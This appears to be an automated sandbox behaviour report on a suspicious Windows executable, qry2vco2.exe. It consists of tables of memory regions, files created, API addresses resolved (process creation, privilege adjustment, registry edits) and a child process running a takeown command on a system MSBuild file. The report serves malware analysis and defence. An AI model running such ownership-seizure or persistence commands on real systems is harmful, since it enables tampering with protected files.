| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:54, Reason: Child Process |
| Unmonitor | End Time: 00:02:56, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd90 |
| Parent PID | 0x150 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D8C
0x
D88
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0063ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00740000 | 0x00769fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x008c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x01ccffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01d5ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:26 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #147: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #147 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:54, Reason: Child Process |
| Unmonitor | End Time: 00:02:55, Reason: Self Terminated |
| Monitor Duration | 00:00:01 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd84 |
| Parent PID | 0x9f0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AF8
0x
D74
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000770000 | 0x00770000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x0077ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x00783fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x00791fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00790000 | 0x00794fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x007b3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000007c0000 | 0x007c0000 | 0x007fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x0083ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000840000 | 0x00840000 | 0x00843fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000850000 | 0x00850000 | 0x00850fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x00861fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00870000 | 0x0092dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000930000 | 0x00930000 | 0x0096ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000970000 | 0x00970000 | 0x009affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009b0000 | 0x009b0000 | 0x009bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000009c0000 | 0x009c0000 | 0x00b4ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x009c0000 | 0x009e9fff | Memory Mapped File | r |
|
|
|
- |
